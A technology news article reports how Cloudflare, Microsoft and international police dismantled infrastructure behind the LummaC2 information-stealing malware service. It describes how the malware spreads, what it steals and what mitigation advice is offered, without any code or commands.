IT Brief India - Technology news for CIOs & IT decision-makers
India
Guides
#
artificial intelligence
#
digital transformation
#
disaster recovery
#
hybrid & remote work
#
internet of things
Search
Story image
#
Malware
#
Ransomware
#
Endpoint Protection

Cloudflare, Microsoft & police disrupt global malware service

Today
Author image
By Sean Mitchell, Publisher

Cloudflare, in partnership with Microsoft and international law enforcement, has helped dismantle the infrastructure supporting LummaC2, an information-stealing malware service regarded as a significant threat to users and organisations worldwide.

This collaborative effort targeted key elements of the Lumma Stealer operation, resulting in the seizure, takedown and blocking of malicious domains, as well as disruption to digital marketplaces used by criminals to distribute and monetise stolen data. Cloudflare also banned a number of accounts used in the deployment and configuration of these domains, aiming to weaken the underlying ecosystem relied on by cybercriminals.

Lumma Stealer, also known as LummaC2, operates as a subscription-based service that enables threat actors to access a central administrative panel through which they can acquire customised malware builds and retrieve data stolen from victims. Stolen information includes credentials, cryptocurrency wallets, cookies and various forms of sensitive data, which can subsequently facilitate identity theft, financial fraud and intrusions into both consumer and enterprise environments.

Blake Darché, Head of Cloudforce One at Cloudflare, said: "Lumma goes into your web browser and harvests every single piece of information on your computer that could be used to access either dollars or accounts – with the victim profile being everyone, anywhere at any time. The threat actors behind the malware target hundreds of victims daily, grabbing anything they can get their hands on. This disruption worked to fully setback their operations by days, taking down a significant number of domain names, and ultimately blocking their ability to make money by committing cybercrime. While this effort threw a sizable wrench into the largest global infostealers infrastructure, like any threat actor, those behind Lumma will shift tactics and reemerge to bring their campaign back online."

First observed on Russian-language crime forums in early 2023, Lumma Stealer's operations have increasingly shifted to Telegram, where cybercriminals buy access and share data using cryptocurrency. Logs of stolen credentials, known as "logs", are indexed and made available through Lumma's own marketplace or resold via other criminal networks.

The spread of Lumma Stealer is primarily achieved through social engineering campaigns. These include deceptive pop-ups — part of a method called ClickFix — which trick users into executing malicious scripts, as well as by bundling payloads in cracked versions of legitimate software and distributing them via pay-per-install networks. The malware's developers invest in bypassing detection from antivirus solutions, increasing the risk to affected users and organisations.

Cloudflare's disruption operations involved placing a Turnstile-enabled interstitial warning page on domains associated with Lumma's command and control servers as well as its marketplace. In addition to impeding access, Cloudflare collaborated with leading industry partners, including Microsoft, multiple registry authorities, the FBI, the U.S. Department of Justice, Europol's European Cybercrime Center, and Japan's Cybercrime Control Center. This was intended to ensure that the criminals could not simply migrate their infrastructure or regain control via alternative registrars.

The tactics used by Lumma's operators relied on abusing infrastructure belonging to providers like Cloudflare, often to obscure the origin IP addresses of servers used to store stolen data. Cloudflare's Trust and Safety team repeatedly suspended malicious accounts and flagged illicit domains, escalating countermeasures after the malware was observed bypassing its initial warning pages.

Mitigation advice for users and organisations includes restricting the execution of unknown scripts, limiting the saving of passwords in browsers, and employing reputable endpoint protection tools capable of detecting credential theft. Regular software updates, DNS filtering and user education around the risks of malvertising and fake software installers are also highlighted as part of a comprehensive defence strategy.

By disrupting Lumma Stealer's infrastructure and limiting access to its command and control services, the operation has imposed significant operational and financial constraints on both the core operators and the wider criminal clientele. The disruption aims to undermine the infostealer-as-a-service model that has contributed to increased instances of cyber-enabled fraud, enterprise security breaches, and ransomware incidents.

Follow us on:
Follow us on LinkedIn Follow us on X
Share on:
Share on LinkedIn Share on X
Related stories
Google DeepMind reveals new strategy to defend Gemini 2.5 AI
Google enhances agent toolkit & unveils updates for secure AI
Report finds low ECH use but risks from malicious actors grow
Fintech sector faces mounting third-party security breach risks
IP Fabric unveils upgrade to boost firewall visibility & compliance
Top stories
AI-driven threats prompt IT leaders to rethink hybrid cloud security
Google announces major Gemini AI upgrades & new dev tools
Google unveils SynthID Detector to verify AI-generated content
Gemini Code Assist launches for all, delivers 2.5x boost
Google boosts education with Gemini 2.5 & LearnLM updates